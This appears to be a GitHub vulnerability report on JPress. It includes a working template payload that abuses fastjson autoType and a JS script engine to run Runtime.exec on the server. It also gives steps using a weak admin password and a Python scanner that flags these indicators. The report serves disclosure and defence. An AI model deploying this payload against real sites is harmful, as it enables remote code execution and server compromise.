
Command execution vulnerability in the JPress admin back end via template upload #169

Closed
@testtttter

Description


Audit process

The JPress back end has a template upload feature, but it applies some filtering. We use fastjson to help obtain a ScriptEngineManager and then execute arbitrary JS code, which achieves RCE. The payload is as follows:

#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance()) 
#(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager")) 
#set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}'))
#set(e=x.getEngineByName("js")) 
#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))

Demonstration

Enter the back end with a weak password, then modify and upload evil.html.

(screenshot)

Visit http://localhost/evil and the calculator pops up; the vulnerability is confirmed.

(screenshot)
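An added example (not from the issue or from JPress) that turns the indicators in this report into a pre-publish scan over uploaded template source: it flags Enjoy static calls (`Class::method`) on fastjson and Runtime, autoType enablement, `@type` in JSON literals, and ScriptEngineManager/eval use. The rule names and denylist are my own; a match means hold the template for review, and a clean scan is not proof a template is safe, since a pattern list only catches what it has been told about.

```python
"""Indicator scan for uploaded Enjoy templates (example for this note, not JPress code).
Flags the patterns quoted in the report: fastjson autoType enablement, "@type"
JSON literals, ScriptEngineManager/eval, and Runtime.exec."""
import re
from typing import List, NamedTuple

class Finding(NamedTuple):
    line: int   # 1-based line in the template
    rule: str   # indicator that fired
    text: str   # matched fragment

# Enjoy's `Class::method` static-call syntax on classes a theme never needs.
STATIC_CALL_RE = re.compile(r"([A-Za-z_][\w.]*)::(\w+)")
DENIED_CLASSES = {
    "com.alibaba.fastjson.parser.ParserConfig", "com.alibaba.fastjson.JSON",
    "java.lang.Runtime", "java.lang.ProcessBuilder",
}

PATTERNS = [  # (rule name, regex) pairs for the remaining indicators
    ("fastjson-autotype-enable", re.compile(r"setAutoTypeSupport\s*\(\s*true\s*\)")),
    ("fastjson-autotype-accept", re.compile(r"addAccept\s*\(")),
    ("fastjson-type-literal", re.compile(r"""['"]\s*\{[^}]*@type""")),
    ("script-engine", re.compile(r"ScriptEngineManager|getEngineByName\s*\(|\.eval\s*\(")),
    ("process-exec", re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec|ProcessBuilder")),
]

def scan_template(source: str) -> List[Finding]:
    """Return one Finding per indicator hit; an empty list means nothing matched."""
    findings: List[Finding] = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for m in STATIC_CALL_RE.finditer(line):
            if m.group(1) in DENIED_CLASSES:
                findings.append(Finding(lineno, "denied-static-call", m.group(0)))
        for rule, pat in PATTERNS:
            findings.extend(Finding(lineno, rule, m.group(0)) for m in pat.finditer(line))
    return findings

# Constructed samples: the directives quoted in the issue, and a benign theme fragment.
SAMPLE = """#set(x=com.alibaba.fastjson.parser.ParserConfig::getGlobalInstance())
#(x.setAutoTypeSupport(true)) #(x.addAccept("javax.script.ScriptEngineManager"))
#set(x=com.alibaba.fastjson.JSON::parse('{"@type":"javax.script.ScriptEngineManager"}'))
#set(e=x.getEngineByName("js"))
#(e.eval('java.lang.Runtime.getRuntime().exec("calc")'))"""
BENIGN = "<h1>#(article.title ?? 'Untitled')</h1>\n#for(x : articles)#(x.title)#end"

if __name__ == "__main__":
    for f in scan_template(SAMPLE):
        print(f"line {f.line}: {f.rule}: {f.text}")
    print("benign findings:", len(scan_template(BENIGN)))
```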
